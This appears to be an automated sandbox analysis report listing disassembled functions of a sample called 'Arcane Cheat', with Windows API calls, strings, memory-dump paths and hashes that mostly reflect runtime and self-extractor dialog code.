                                  • Instruction Fuzzy Hash: C24128B14083069FC714DF64C88096BFBF8FB88755F004A2EF596D2650E738E549CB62
                                  Function 0084EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0084F5A2,?,00000000,?,00000000,00000000), ref: 0084EE6F
                                  • __fassign.LIBCMT ref: 0084EEEA
                                  • __fassign.LIBCMT ref: 0084EF05
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0084EF2B
                                  • WriteFile.KERNEL32(?,?,00000000,0084F5A2,00000000,?,?,?,?,?,?,?,?,?,0084F5A2,?), ref: 0084EF4A
                                  • WriteFile.KERNEL32(?,?,00000001,0084F5A2,00000000,?,?,?,?,?,?,?,?,?,0084F5A2,?), ref: 0084EF83
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: d64e3b3f3192c81e4f2cba19e50e20e57f7b20c0005fab4f066ae3a7e9cd3c6a
                                  • Instruction ID: e2909ab7a137e082e27a2ec218a43fe8a49faa92313c45ab9f6dda5d44dde456
                                  • Opcode Fuzzy Hash: d64e3b3f3192c81e4f2cba19e50e20e57f7b20c0005fab4f066ae3a7e9cd3c6a
                                  • Instruction Fuzzy Hash: F251D270A0020D9FCB10CFA8DC85AEEBBF9FF08300F24415AE555E7291EB70AA45CB61
                                  Function 0083C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0083C54A
                                  • _swprintf.LIBCMT ref: 0083C57E
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • SetDlgItemTextW.USER32(?,00000066,0086946A), ref: 0083C59E
                                  • _wcschr.LIBVCRUNTIME ref: 0083C5D1
                                  • EndDialog.USER32(?,00000001), ref: 0083C6B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                  • String ID: %s%s%u
                                  • API String ID: 2892007947-1360425832
                                  • Opcode ID: b00f9ca9c77b365294bbd5d1ea2dac7abc9b7b118ee34dd0b5ec11210978cd48
                                  • Instruction ID: f9c12338883c5a7c07907e92179d559c5f50a654e043398a76ce7622a6ff057a
                                  • Opcode Fuzzy Hash: b00f9ca9c77b365294bbd5d1ea2dac7abc9b7b118ee34dd0b5ec11210978cd48
                                  • Instruction Fuzzy Hash: 0941E4B190062CAADF26DBA4DC45EDA77BCFF48305F0050A6E509E60A1EB759BC4CF91
                                  Function 00838E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00838F38
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00838F59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AllocByteCharGlobalMultiWide
                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                  • API String ID: 3286310052-4209811716
                                  • Opcode ID: 2a1be605665987b5b58230922c0c0da4d892384d8f605ff971fe71ba1d7d8911
                                  • Instruction ID: 6f8a7e0c4ba2635bd06128d7804c3b486ca30f0c2dfcd6ba8108935e75850956
                                  • Opcode Fuzzy Hash: 2a1be605665987b5b58230922c0c0da4d892384d8f605ff971fe71ba1d7d8911
                                  • Instruction Fuzzy Hash: B6312332548315BBD721AB289C06FAF77A8FF91761F100119F811E62C1EF689A4983E6
                                  Function 00839635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 0083964E
                                  • GetWindowRect.USER32(?,00000000), ref: 00839693
                                  • ShowWindow.USER32(?,00000005,00000000), ref: 0083972A
                                  • SetWindowTextW.USER32(?,00000000), ref: 00839732
                                  • ShowWindow.USER32(00000000,00000005), ref: 00839748
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Window$Show$RectText
                                  • String ID: RarHtmlClassName
                                  • API String ID: 3937224194-1658105358
                                  • Opcode ID: 01c6ab4a5619f04548289570d8678c7b512643fb8ddefcf1096ea3d0f3dc88d4
                                  • Instruction ID: 340703e0bb8e0384b4aebd609afa2ec540a47120d0a77cc3771450eb45897459
                                  • Opcode Fuzzy Hash: 01c6ab4a5619f04548289570d8678c7b512643fb8ddefcf1096ea3d0f3dc88d4
                                  • Instruction Fuzzy Hash: CB31CF35004204EFCB119F68DC8DB6B7BA8FF88711F114559FE89DA1A2DB74E944CBA1
                                  Function 0084BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0084BF79: _free.LIBCMT ref: 0084BFA2
                                  • _free.LIBCMT ref: 0084C003
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084C00E
                                  • _free.LIBCMT ref: 0084C019
                                  • _free.LIBCMT ref: 0084C06D
                                  • _free.LIBCMT ref: 0084C078
                                  • _free.LIBCMT ref: 0084C083
                                  • _free.LIBCMT ref: 0084C08E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction ID: a94657bdfc74e0fbe340b1ea7ac80dbae15c342b0b4b8c1610cb5d8caca9bd79
                                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction Fuzzy Hash: FD11EA71940B0CFAD620BBB4CC06FCBB79DFF14700F408855B29DE6852DF65E9088A92
                                  Function 008420CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,008420C1,0083FB12), ref: 008420D8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008420E6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008420FF
                                  • SetLastError.KERNEL32(00000000,?,008420C1,0083FB12), ref: 00842151
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 94bd86ab110277c3d80f392512e5dd9b7d2e5b1d83c65a5f168f51a5146183dc
                                  • Instruction ID: 204830361962a4a35bf739081a293cb9c76d4c39aeaaa2ad1cfca372da86e6fe
                                  • Opcode Fuzzy Hash: 94bd86ab110277c3d80f392512e5dd9b7d2e5b1d83c65a5f168f51a5146183dc
                                  • Instruction Fuzzy Hash: 0101D43220D71DAEB6682FB97C8552A3AC8FB317B6761062AF210D51E0FE155D019144
                                  Function 0083DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                  • API String ID: 0-1718035505
                                  • Opcode ID: a9d42c66238515a04a8bbec8aee800849c6ae881293c78dca736e142c609ca2b
                                  • Instruction ID: 013216a48502dd358abae4a267319bd0a6a2015ea2f8fb44a8a71325cf6583cc
                                  • Opcode Fuzzy Hash: a9d42c66238515a04a8bbec8aee800849c6ae881293c78dca736e142c609ca2b
                                  • Instruction Fuzzy Hash: 420128716517225B4FB05FB97C912A663D9FBC1357B20253AED01D3340DA95C88BDBE0
                                  Function 00830CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830D0D
                                    • Part of subcall function 0082ACF5: GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  • LocalFileTimeToFileTime.KERNEL32(?,00830CB8), ref: 00830D31
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00830D47
                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00830D56
                                  • SystemTimeToFileTime.KERNEL32(?,00830CB8), ref: 00830D64
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830D72
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion
                                  • String ID:
                                  • API String ID: 2092733347-0
                                  • Opcode ID: 0caaa635a3cefb3191f5205e2282d918adf94d8e7e4d2f7e24af162770395899
                                  • Instruction ID: 6b0eabdbc350c570be7a656b11365a035642cad506547d62700243b39ae67630
                                  • Opcode Fuzzy Hash: 0caaa635a3cefb3191f5205e2282d918adf94d8e7e4d2f7e24af162770395899
                                  • Instruction Fuzzy Hash: FC31E97A900209EBCB00DFE4D8859EFBBBCFF58711F04456AE955E3210E7349645CB65
                                  Function 008391B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: 4c5ad48215c46cadb1e3953cd48f4d7a1997e77790beb5a826770d9808f35c7c
                                  • Instruction ID: aea1727b0a6b2d433671903505f733c53e48e31a21c4a8c245fe679e717c4e33
                                  • Opcode Fuzzy Hash: 4c5ad48215c46cadb1e3953cd48f4d7a1997e77790beb5a826770d9808f35c7c
                                  • Instruction Fuzzy Hash: 8921A171A0460EBBD7049F14CC81E6B77ADFBD0B89F108128FC59DA312E2B4ED4586D1
                                  Function 00848FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,00860EE8,00843E14,00860EE8,?,?,00843713,00000050,?,00860EE8,00000200), ref: 00848FA9
                                  • _free.LIBCMT ref: 00848FDC
                                  • _free.LIBCMT ref: 00849004
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 00849011
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 0084901D
                                  • _abort.LIBCMT ref: 00849023
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: 28fde26ea95e5092ca1881eddb4e562bb5f76a989abf3e02a899f15fc0095463
                                  • Instruction ID: 9405839afa9449df416738846512f41bc481351572f74098a6120aaf44e6ee75
                                  • Opcode Fuzzy Hash: 28fde26ea95e5092ca1881eddb4e562bb5f76a989abf3e02a899f15fc0095463
                                  • Instruction Fuzzy Hash: F8F02835504F08EBC722332C6C0AF2F299AFBE17B1B250014F515E2292FF25CE025516
                                  Function 0083D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0083D2F2
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083D30C
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083D31D
                                  • TranslateMessage.USER32(?), ref: 0083D327
                                  • DispatchMessageW.USER32(?), ref: 0083D331
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0083D33C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 2148572870-0
                                  • Opcode ID: 687610202523b98849667b895d4d8f0dcba20218b6e91f98446261bd7fe44b07
                                  • Instruction ID: 744a8954929aa17020a7a954eb896272f6cacb57c0393e16dc3a62fc709d974c
                                  • Opcode Fuzzy Hash: 687610202523b98849667b895d4d8f0dcba20218b6e91f98446261bd7fe44b07
                                  • Instruction Fuzzy Hash: A5F03C72A01619ABCB206BA5EC4CEDBBF7DFF91391F008112FA06D2150E6348951CBE1
                                  Function 0083C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcschr.LIBVCRUNTIME ref: 0083C435
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CompareString_wcschr
                                  • String ID: <$HIDE$MAX$MIN
                                  • API String ID: 2548945186-3358265660
                                  • Opcode ID: 483e31eac5f2f5f0e678e976acb077a1d73f42b545fb8d53584e348728c8a1f5
                                  • Instruction ID: ad5a2bb749406edca6ba2d9722d862e32695da42b9b3e268c065b8da80582c0c
                                  • Opcode Fuzzy Hash: 483e31eac5f2f5f0e678e976acb077a1d73f42b545fb8d53584e348728c8a1f5
                                  • Instruction Fuzzy Hash: 1631B27690020DAADF21DA58CC55EEA77BDFB94304F0040A6FA48E6190EBB49EC4CB91
                                  Function 0083ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadBitmapW.USER32(00000065), ref: 0083ADFD
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0083AE22
                                  • DeleteObject.GDI32(00000000), ref: 0083AE54
                                  • DeleteObject.GDI32(00000000), ref: 0083AE77
                                    • Part of subcall function 00839E1C: FindResourceW.KERNEL32(0083AE4D,PNG,?,?,?,0083AE4D,00000066), ref: 00839E2E
                                    • Part of subcall function 00839E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0083AE4D,00000066), ref: 00839E46
                                    • Part of subcall function 00839E1C: LoadResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E59
                                    • Part of subcall function 00839E1C: LockResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                  • String ID: ]
                                  • API String ID: 142272564-3352871620
                                  • Opcode ID: cdc5a6a514d39e050f11d1fc13fdd94ccc1e8eb16b5acea9dd2cf898f7759a78
                                  • Instruction ID: 596e729a83c0fd2394a2840817bd1ade14af09b878033e7df452eca0b9e7ae09
                                  • Opcode Fuzzy Hash: cdc5a6a514d39e050f11d1fc13fdd94ccc1e8eb16b5acea9dd2cf898f7759a78
                                  • Instruction Fuzzy Hash: B601C036540625A6DB1067689C0AA7F7B6AFBC1B52F080015FD80E7291DFB28C1596E3
                                  Function 0083CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083CCDB
                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0083CCF1
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0083CD05
                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0083CD14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: RENAMEDLG
                                  • API String ID: 445417207-3299779563
                                  • Opcode ID: 1182f5792f6c4c9d65d9f24a6d2cfd3b13e815cdc2b867ca6250c4748ace9c37
                                  • Instruction ID: aef3baf0cc6927bbb1dfa71b54ee00e39d78cabffe38502f6600259bf182ed9b
                                  • Opcode Fuzzy Hash: 1182f5792f6c4c9d65d9f24a6d2cfd3b13e815cdc2b867ca6250c4748ace9c37
                                  • Instruction Fuzzy Hash: 920128322842147AD6314F689C0CF577B5DFBDA702F200410F349F21E0C6A1A905DBA5
                                  Function 008475C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00847573,00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002), ref: 008475E2
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008475F5
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00847573,00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002), ref: 00847618
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
